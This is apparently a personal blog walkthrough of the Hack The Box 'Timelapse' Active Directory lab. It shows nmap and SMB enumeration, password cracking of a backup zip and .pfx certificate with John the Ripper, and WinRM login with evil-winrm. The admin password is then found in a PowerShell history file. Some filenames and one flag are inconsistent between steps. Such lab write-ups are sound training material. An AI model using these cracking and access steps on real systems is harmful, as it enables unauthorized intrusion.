HTB Timelapse Walkthrough

5 min readDec 27, 2023

Introduction

In this post, I dive into “Timelapse,” an easy-rated Active Directory machine from Hack The Box. I’ll share a straightforward account of my process, from initial enumeration to final privilege escalation, reflecting on the practical steps and methodologies I used.

NMAP SCAN

nmap -sC -p0-65535 -Pn -sV --stats-every 10s -T4 10.10.11.152
Host is up (0.069s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-15 07:10:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_ssl-date: 2022-04-15T07:12:29+00:00; +8h16m35s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
51534/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h16m34s, deviation: 0s, median: 8h16m34s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-04-15T07:11:49
|_  start_date: N/A

SMB Enumeration

An Nmap script scan indicated that the `Guest` SMB account is enabled on the target machine.

nmap -Pn -d --script=smb-enum-users -p 445 10.10.11.152
NSE: Starting smb-enum-users against 10.10.11.152.
NSE: [smb-enum-users 10.10.11.152] SMB: Added account '' to account list
NSE: [smb-enum-users 10.10.11.152] SMB: Added account 'guest' to account list
NSE: [smb-enum-users 10.10.11.152] Couldn't negotiate a SMBv1 connection:SMB: Failed to receive bytes: ERROR
NSE: [smb-enum-users 10.10.11.152] Couldn't negotiate a SMBv1 connection:SMB: Failed to receive bytes: ERROR
NSE: Finished smb-enum-users against 10.10.11.152.

Accessing the ‘Shares’ Directory

Listing the machine’s shares revealed standard SMB directories. However, the `Shares` directory got my attention.

smbclient -L 10.10.11.152

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Upon connecting to the ‘Shares’ SMB share, I discovered a directory named ‘Dev’ containing a .zip file named ‘winrm_backup’. I downloaded the file locally to take a look at it.

User Enumeration

I utilized Metasploit’s auxiliary/scanner/smb/smb_lookupsid module to enumerate users on the target machine, successfully identifying several user accounts.

Cracking the Backup File

The ‘.zip’ file was password-protected, so I extracted its hash using John the Ripper (JtR) with the command:

zip2john winrm_backup.zip > zip.hash

Then, I cracked the hash offline using JtR:

john --wordlist=rockyou.txt ziphash.txt > password.txt

Analyzing the .pfx File

The .zip file contained a .pfx file, which is password-protected and in PKCS#12 format, typically housing both SSL certificates (public keys) and private keys. These components are crucial for authenticating to services like `WINRM`. By splitting the .pfx into a `.pem` file and a `.key` file, it’s possible to use the private key as `alternate authentication` mechanism, bypassing traditional access controls for lateral movement within an environment. This approach exploits systems’ reliance on alternate authentication, which, when exposed, can be leveraged for unauthorized access.

Acquiring the hash of the `.pfx` file:

pfx2john legacyy_dev_auth.pfx > pfxhash.hash

Cracking the hash offline

john --wordlists=rockyou.txt pfxhash.txt > pfxcracked.txt

Splitting the `.pfx` file into `.pem` and `.key`

openssl pkcs12 -in legacyy_dev_auth.pfx -out privateKey.key -nocerts -nodes

openssl pkcs12 -in legacyy_dev_auth.pfx -out certificate.pem -nokeys -clcerts

Initial Access via WINRM

For Initial Access via WINRM, I used evil-winrm with the certificate and private key from the ‘legacyy_dev_auth.pfx’ file to log in as the ‘legacyy’ user.

evil-winrm -S -i 10.10.11.152 -u legacyy -c cert.crt -k deauthkey.key

Privilege Escalation

I discovered the administrator's credentials within the PowerShell history of user 'legacyy', located at:

C:\Users\legacyy\appdata\roaming\microsoft\windows\powershell\psreadline

This discovery allowed me to authenticate with the administrator's password through WINRM using evil-winrm.